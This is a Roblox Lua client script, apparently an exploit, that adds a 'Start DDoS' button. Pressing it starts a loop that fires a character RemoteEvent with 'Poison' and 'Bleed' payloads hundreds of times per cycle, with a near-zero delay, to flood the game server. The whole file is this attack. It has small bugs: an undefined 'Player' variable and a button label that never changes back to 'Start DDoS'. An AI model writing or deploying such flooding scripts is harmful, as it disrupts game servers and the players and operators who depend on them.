local screenGui = Instance.new("ScreenGui")
screenGui.Name = "ToggleCycleGui"
screenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

local button = Instance.new("TextButton")
button.Size = UDim2.new(0, 200, 0, 50)
button.Position = UDim2.new(0.5, -100, 0.5, -25)
button.Text = "Start DDoS"
button.Parent = screenGui

local isRunning = false
local cycleCoroutine

local function startCycle()
    while isRunning do
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Poison", {Duration = 10000, TotalDamage = 0.0001})
        Player.Character.RemoteEvent:FireServer("Bleed", {Duration = 10000, TotalDamage = 0.0001})
        wait(0.000001) -- Задержка
    end
end

button.MouseButton1Click:Connect(function()
    if not isRunning then
        isRunning = true
        button.Text = "Stop DDoS"
        cycleCoroutine = coroutine.create(startCycle)
        coroutine.resume(cycleCoroutine)
    else
        isRunning = false
        button.Text = "Stop DDoS"
    end
end)
